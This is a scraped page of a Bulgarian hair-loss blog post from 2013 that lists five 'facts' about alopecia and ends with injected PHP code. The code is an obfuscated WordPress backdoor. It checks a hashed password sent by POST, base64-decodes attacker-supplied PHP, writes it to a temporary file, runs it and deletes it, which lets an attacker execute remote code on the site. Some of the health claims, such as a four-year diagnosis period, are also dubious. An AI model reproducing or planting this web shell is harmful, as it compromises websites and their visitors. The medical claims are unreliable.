5 малко известни истини за косопада | Косопад

5 интересни факта за косопада

Предлагаме ви 5 интересни факта за косопада и оплешивяването, които навярно ще ви заинтригуват. Надяваме се също така, че те ще ви бъдат и полезни, защото всъщност дават отговорите на някои фундаментални въпроси.

косопад и оплешивяване

Интересни факти за косопад и опрешивяване

• За да се диагностицира категорично причината за косопад са необходими цели четири години. През това време се правят различни изследвания и се наблюдава цялостната здравна картина на пациента.

• Ако сте засегнати отидете при дерматолог. Оплешивяването е отделна наука и принципно обикновеният домашен лекар няма да ви е толкова полезен, колкото специалиста по кожни болести. Това е важно, защото ако оплешивяването е забелязано в начален стадий, има много по – голяма вероятност да бъде овладяно.

• Съществуват около петдесет вида косопад, които са описани в учебниците към днешна дата. В научните среди обаче предполагат, че броят е много по – голям, но засега никой не се е заел да диагностицира в дълбочина новите видове.

• Единствено правилната диагноза при косопад, може да гарантира най – доброто лечение за вас. Оплешивяването трябва да се третира едва, след определяне на типа и причините.

• Различните форми на косопад трябва да се лекуват по различен начин. В зависимост от вида на оплешивяване, при някои хора може да помогне една методика или лосион против косопад, а при други съвсем различна. Понякога е нужно доста време, за да спечелите битката. Не се отчайвайте и изпробвайте всички подходящи средства.

29. март 2013 23:50:53 от Косопад
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}